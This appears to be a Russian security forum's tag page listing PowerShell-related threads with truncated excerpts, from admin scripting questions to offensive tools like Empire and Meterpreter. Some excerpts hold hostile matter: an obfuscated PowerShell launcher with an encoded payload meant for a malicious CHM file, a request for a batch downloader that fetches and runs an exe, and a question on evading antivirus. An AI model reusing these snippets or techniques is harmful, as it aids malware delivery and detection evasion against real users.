• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

powershell

  1. useless

    Статья Анализ вируса Chromeloader: что, как и с чем едят или чем опасно пиратство

    Wassup. Наверное каждому современному интернет-пользователю известно, что такое удовольствие как "скачать бесплатно без смс и регистрации" может понести за собой некие последствия. И дело даже не в том, что во многих странах это уголовно наказуемо, и не в том, что разработчики тратят годы на...
  2. E

    Сильно ли нужны знания PowerShell для хакерской деятельности?

    Сильно ли нужны знания PowerShell для хакерской деятельности? Только начинаю вливаться в ИБ, и появился такой вопрос "Что же начать изучать?". Python само по себе, JS знаю. Наткнулся на статьи, где ИБэшники прогают на PowerShell и создают всякого рода вирусы, с помощью которых получают доступ к...
  3. B

    Ошибки при установки Empire

    Всех приветствую. Прошу помощи с установкой Empire. Прежде чем перейти к написанию комментария/совета, внимательно прочтите какие попытки решения проблемы уже были предприняты, что бы не дублировать советы и не уточнять «причину получения бана в гугле». Проблема - не встаёт как надо / не...
  4. LoeDifrakTion

    Статья Введение и взаимодействие в Windows

    Wazzup пользователи Codeby.net. 1. Введение Для тестировщика на проникновение важно знать самые разные технологии. Глубокое понимание операционных систем Windows и Linux полезно при проведении широкого спектра типов CTF. Большинство систем, с которыми Вы будете сталкиваться в CTF, будь то...
  5. A

    Out minidump в powershell

    Доброго времени суток, интересует вот такой вопрос- как составить запрос на скачивание и импортирование модуля out-minidump для powershell, чтоб он и скачался через него и установился? Готов посодействовать финансово за помощь
  6. Vertigo

    Soft Meterpreter

    Приветствую всех Жителей Форума. Сегодня будем рассматривать атакующий инструмент,включающий в себя постэксплуатационные модули. И основной функционал,который реализован в powershell. Обязан своим появлением он португальскому специалисту Pedro Ubuntu. Вдохновение и основа скрипта была...
  7. T

    Гостевая статья Управление сессиями Powershell

    Когда вы создаете удаленное соединение между двумя компьютерами, вы создаете - в терминологии PowerShell - сессию. Существует невероятное количество опций, которые могут быть применены к этим сессиям, и в этой части руководства мы расскажем вам о них. Ad-Hoc vs. Persistent Sessions Когда вы...
  8. Mister Pilligrim

    Вопрос по PowerShell

    Ребята подскажите пожалуйста, нужно написать скрипт на Power Shell который выводит количество и список включенных(активных) локальных администраторов на рабочей станции в формате: Count | Names 2 |Admin; Root Как получить активных пользователей понятно: Get-LocalUser | where...
  9. I

    Копирование объектов AD

    Добрый день, нужна помощь в следующей ситуации: есть ветка AD с пользователями, есть ветка с контактами, нужен скрипт который сравнивал бы содержимое OU user и в случае необходимости, создавал в OU Contacts объект "контакт" с полями displayName и mail. Возможно есть другие средства для...
  10. A

    Обфускация powershell-кода для последующего внедрения в CHM-файл

    Сгенерирован код.powershell -w 1 -C sv YnA -;sv n ec;sv GHP ((gv YnA).value.toString()+(gv n).value.toString());powershell (gv GHP).value.toString() 'JAB3AFYAUwBBACAAPQAgACcAJA....,бла-бла-еще_много_букавок_H0A' Позже код используется для внедрения в CHM-файл как описано тут Вредоносные CHM Всё...
  11. A

    как bat-файлом подгрузить с инета файл и исполнить его?

    Файлы находятся по этим адресам http://xxx.xxx.xxx.xxx/12345.pdf и http://xxx.xxx.xxx.xxx/123.exe Хочется написать батничек, который бы скачивал эти файлики в папку %TEMP% и отправлял их на исполнение. Вроде бы это можно сделать с помощью powershell. Был написан скрипт: @echo off set...
  12. P

    Пароль из скрипта PowerShell

    Здравы всем. По скольку я не имею никакого опыта в программировании, то хотел бы просить Bашей помощи. Помогите разобрать файл. А именно вытащить все логины, пароли, явки. Голову сломал сидя и пытаясь понять как работает PS. Заранее благодарю. Так же, если уж получится или потребуется...
  13. clevergod

    Статья Автоматизация - скрипт проверки надежности паролей пользователей домена

    Как и обещал, выкладываю скрипт проверяющий на надежность парольную политику с отправкой уведомления провинившемуся в маскированном виде и общий свод по всем безопаснику. Данный процесс в действительности наглядно меняет понятие пользователей о парольной защите, ведь ВНД никто не читает и...
  14. clevergod

    Статья Автоматизация - скрипт выключения ПК с уведомлением

    Решили отрыть Вам исходники скриптов, которыми пользуемся достаточно давно и писались исключительно с целью автоматизации различных процессов. В данной статье выложим скрипт, который собирает все ПК с домена, фильтрует исключения групп, пингует на доступность, тушит ПК домена и отправляет отчет...
  15. B

    Статья Как поменять Shell на Bash

    Как переключиться с ksh shell на bash в Linux или Unix ? Как изменить оболочки в Unix-подобной системе? Оболочка (shell) – это не что иное, как команда, которая предоставляет текстовый пользовательский интерфейс (также известный как «интерфейс командной строки») для Linux, MacOS и...
  16. Z

    Подскажите, как обходят проактивную защиту АВ (PowerShell)

    Здравствуйте уважаемые профессионалы! Являюсь, можно сказать, начинающим пентестером и пока не могу обойти указанную проблему. Для теста использую каспера фри, так как думаю, что если его получится обойти, то и с другими АВ получится :) Итак, что имеем: 1. Kali Linux, Metasploit Framework, ну и...
  17. 5

    Empire Powershell

    После установки пытаюсь запустить Empire, появляется следующая ошибка. Почитал что пишут в проблемах на гитхабе, сделал то что там говорят, нихрена что-то не помогло, быть может тут знает кто решение? Traceback (most recent call last): File "./empire", line 13, in <module> from lib.common...
  18. C

    Как указать относительный путь к файлу в powershell?

    добрый день, есть powershell скрипт, в нём указан путь к файлу для запуска, но он абсолютный, а мне нужен относительный путь , то есть powershell скрипт должен запускать файл находящийся в той же директории что и сам скрипт. пробовал следующие пути: ./ ../ .\ ..\\ %UserProfile%\Desktop\...
  19. gushmazuko

    Статья Bootable Windows USB Stick with UEFI support

    Введение Приветствую всех на форуме Сегодня мне потребовалось записать Windows 10 на флешку. Так как я не особо люблю пользоваться сторонним софтом, все что можно сделать подручными средствами я пытаюсь сделать сам. Обычно я готовил USB Stick с помощью diskpart и robocopy, но тут я подумал а...
  20. i3wm

    Статья Охотник за пользователями WinAPI: hunter

    Охотник за пользователями WinAPI Во время работы Red Team вполне обычным является отслеживание/охота на конкретных пользователей. Предположим, что у нас уже есть доступ к рабочему столу в качестве обычного пользователя (не важно как мы его получили, всегда «предполагаем взлом») в Windows Домене...